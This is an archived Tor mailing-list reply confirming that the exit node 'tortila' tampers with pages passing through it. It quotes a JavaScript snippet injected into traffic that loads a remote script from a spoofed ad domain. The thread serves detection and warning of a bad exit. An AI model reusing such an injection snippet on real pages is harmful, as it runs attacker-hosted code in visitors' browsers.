[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]

Re: tortila as a bad exit

To: or-talk@xxxxxxxxxxxxx
Subject: Re: tortila as a bad exit
From: Hans Schnehl <torvallenator@xxxxxxxxx>
Date: Tue, 12 Aug 2008 17:23:22 +0200
Delivered-to: archiver@xxxxxxxx
Delivered-to: or-talk-outgoing@xxxxxxxx
Delivered-to: or-talk@xxxxxxxx
Delivery-date: Tue, 12 Aug 2008 11:23:54 -0400
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:date:from:to:subject :message-id:references:mime-version:content-type:content-disposition :in-reply-to:user-agent; bh=3Txt3iMAeEICw66eHnO4mjjds78aaavBpQGAXoCfobk=; b=RhleR82XcKM1T1aekuKmx7OrW9Rhf1QInPvrQ3MaQyJC9ZT6zLprw6uJ6sMeASGCzE qsG+5dIYW/bKJnsMYUXtGB0tCeOXOiL9dwLzAS37ISuyKI6kwcx6rReCac+RXWzMCoa8 PgmiEXZA9bpDqG99yds+FJpD/Z6Boo0f4gyUI=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=date:from:to:subject:message-id:references:mime-version :content-type:content-disposition:in-reply-to:user-agent; b=IgUPXTqcY3YLEXhATX/C9wNlOjhyCcbKomOawPvt+lv62KbAvGBeNqZtc4pRQrF+qg YEcTD+pkqfuq90I6nffN54rGqHk0aw/zJZTperHhhTDnOy+FSm1CPT0TNGn3C3g6hDl+ GIi649xpnV49aHpZ7EL4rQDjgCUyabJOgPUZ4=
In-reply-to: <200808121130.04139.robert@xxxxxxxxxxxxxxx>
References: <200808120430.m7C4UKng005537@xxxxxxxxxxxxx> <20080812090913.GA17438@xxxxxxxxxxxxxxxxxxx> <200808121130.04139.robert@xxxxxxxxxxxxxxx>
Reply-to: or-talk@xxxxxxxxxxxxx
Sender: owner-or-talk@xxxxxxxxxxxxx
User-agent: Mutt/1.5.18 (2008-05-17)

On Tue, Aug 12, 2008 at 11:29:56AM +0100, Robert Hogan wrote:
> On Tuesday 12 August 2008 10:09:13 Drake Wilson wrote:
> > Quoth Scott Bennett <bennett@xxxxxxxxxx>, on 2008-08-11 23:30:20 -0500:
> > >      I'm not convinced.  It hasn't taken any 300 circuits for me.  It
> > > seems to happen every time I have a circuit that exits via tortila.  It
> > > happens with every destination web page.
> >
> > I can confirm this.  I can't seem to find much pattern to it, though.
> >
> 
> I did a simple wget test (no privoxy) and found fairly consistent insertions of 
> adsense spam to stevepavlima.com regardless of the site I targeted (google.*, 
> guardian.co.uk, irishtimes.com, cnn.com).
> 
> <script type="text/javascript">var 
> externalscript="http://pagead2.googlesyndication.stevepavlima.com/show_ads.js";; 
> document.write('<script type="text/javascript" src="'+externalscript+'?'+new 
> Date() * 1+'"><\/script>');</script>
> 
> I found that using a regular browser the corruption appears infrequent (caching, 
> browsers doing their best to make sense of gargabe), but the corruption is 
> consistent using wget. Where there was no insertion of stevepavlima.com (which 
> was rare) I just saw simple truncation.
> 
> Can anyone else confirm this?
> 

Yes, I can confirm this.  Sending single requests to random
addresses via this node  is sufficient. I did this on two following
days, the first go was quite immediately after a post in or-talk
regarding this issue, so possibly there were others also trying to
check this node at that time. The second go though was about 24
hours later, so the first 'rush' of testing tortila might have been
over, but results are similar.  Very few of the results were
requested via 'host.node.exit' but most were done with a  modified
torrc.  I chose sites that have content where I just about know what
to expect without double-checking.  These results were unforced,
meaning that only one request was sent at a time. But even the
honourable torproject.org site had a minor (bottom) change of
appearance.

There is a simple browser feature, which is to simultanously open
all bookmarks in a bookmark folder. Doing this it was possible to
get results of mixing pages, one time the source site from where content
was merged into others plus the modified ones.  Streams seem to have
mixed up somehow with other pages' content or the page itself got
mixed up. On some altered pages 'noise' is to be found, that could
be interpreted as dump of encrypted traffic added unmodified in
between valid html/php/ or whatever tags.  Others are simply
incomplete, maybe the missing parts have merged into other streams.
Some of them show php/perl/html tags printed. 

I tried only one other node similar to 'tortila', which was 'nexus', 
but could not at all reproduce the results from 'tortila' there. 
Maybe I should continue with other methods.  
As noted, this is done with very little effort, but I hope it can help.

As of today, 12th of August and a few more tries, it appears as if
this behaviour can be witnessed without any real effort, any
connection from the Tor network through 'tortila' is endangered of
being modified.  There is no obvious pattern, changes are random and
make no sense, yet I do not really believe this to be a bug in Tor.

There are the same javascript tags reappearing on a number of
altered pages, there is the same mixed nonsense, again javascript
related, within pages if requests for the same page are made at
another time.  There also seem to be pages more resistant or even
more or less immune against this as they do not use javascript. 
My best guess is some http proxy with filtering capabilities is
misconfigured to run with a Tor exitnode is the cause of this issue.

The worse guess is someone trying to make money with the Tor network
by adding payed ads to webpages in order to reach a rather huge
audience. If this is so, it is not very successful. But this
certainly is a 'bad exit' if the owner does not manage a proper
reconfiguration.

And yes,  stevepavlima is very frequent on modified pages.

Regards

Hans

References:
- Re: tortila as a bad exit
  - From: Scott Bennett
- Re: tortila as a bad exit
  - From: Drake Wilson
- Re: tortila as a bad exit
  - From: Robert Hogan

Prev by Author: Re: exit node "tortila" adds material to www.barnesandnoble.com home page
Next by Author: Question about Tor/Proxy server and connection type
Previous by thread: Re: tortila as a bad exit
Next by thread: Re: tortila as a bad exit
Index(es):
- Author
- Thread